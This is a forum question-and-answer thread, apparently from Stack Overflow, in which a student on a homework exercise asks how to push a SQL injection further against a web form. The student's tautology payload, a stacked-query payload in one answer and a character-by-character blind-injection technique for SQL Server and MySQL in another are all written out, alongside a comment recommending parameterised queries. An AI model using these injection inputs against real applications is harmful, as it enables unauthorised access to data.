SQL Injection - MYSQL

Question

I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:

select * from contacts where name = ''

I managed to see the users in the table using this:

select * from contacts where name = 'anything' or 1='1'

But my question is how I can write it so that I can write a new query? Or see the database name for example so that I can check other tables.

EDIT:

To avoid confusion the query is not given to us, there is a textfield on a webpage, that's what we use to do SQL injection.

So imagine the query is being this:

select * from contacts where name = ''

And I wrote this to the text field, to see all the users.

anything' or 1='1

I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.

Thank you.

How are you seeing the results? Are you running the query directly in sql? — clinomaniac, Dec 15 '17 at 18:50
I'm seeing the results on a webpage. Originally I don't have any idea about the query but since this is an homework it is being shown to us. There is a text field where you insert the name, which I wrote ( anything' or 1='1 ) in to the text field to see all the users. @clinomaniac — TurhanG, Dec 15 '17 at 19:07
What language is the page written in? Look into using parameters. It would look something like select * from contacts where name = ? and then you would pass in the value. — clinomaniac, Dec 15 '17 at 19:09
@clinomaniac Probably PHP and MYSQL. You can check my edit of the post maybe that will give you a better understanding. — TurhanG, Dec 15 '17 at 19:11
Are you trying to do SQL Injection and get more information from the database? I thought you were asking about how to write the query to avoid sql injection. — clinomaniac, Dec 15 '17 at 19:14

score 0 · Answer 1 · answered Dec 15 '17 at 19:16

0

So if the query is :

select * from contacts where name = ''

You can try something like:

'; select * from anotherTableName'

answered Dec 15 '17 at 19:16

clinomaniac

2,200
2
17
22

score 0 · Answer 2 · answered Dec 15 '17 at 19:24

If your data does not return multi-result sets then you can so something like:

In SQL Server

SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...

Until you get all the correct indexes of the characters in the name.

In MySQL it would be something like:

SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...

SQL Injection - MYSQL

2 Answers2

Linked